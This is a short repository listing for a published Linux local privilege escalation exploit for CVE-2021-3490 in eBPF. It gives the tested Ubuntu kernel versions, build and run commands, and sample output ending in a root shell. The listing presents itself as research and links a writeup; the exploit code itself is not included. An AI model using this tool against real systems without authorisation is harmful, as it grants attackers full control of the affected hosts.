chompie1337/Linux_LPE_eBPF_CVE-2021-3490

Open-source software name (OpenSource Name):

chompie1337/Linux_LPE_eBPF_CVE-2021-3490

Open-source software URL (OpenSource Url):

https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490

Open-source programming language (OpenSource Language):

C 99.5%

Open-source software introduction (OpenSource Introduction):

Linux_LPE_eBPF_CVE-2021-3490

LPE exploit for CVE-2021-3490. Tested on Ubuntu 20.04.02 and 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58, and on Ubuntu 21.04 (Hirsute Hippo) kernel 5.11.0-16.17. The vulnerability was discovered by Manfred Paul @_manfp and fixed in this commit.

author: @chompie1337

For educational/research purposes only. Use at your own risk.

Usage:

To build for Ubuntu 20.04.02 and Ubuntu 20.10 (Groovy Gorilla):

make groovy

To build for Ubuntu 21.04 (Hirsute Hippo):

make hirsute

To run:

bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#

Note: You must exit the root shell cleanly by typing exit so that the exploit can perform its cleanup; otherwise the kernel may panic.

Check out the writeup Kernel Pwning with eBPF: a Love Story.

This research was sponsored by Grapl.
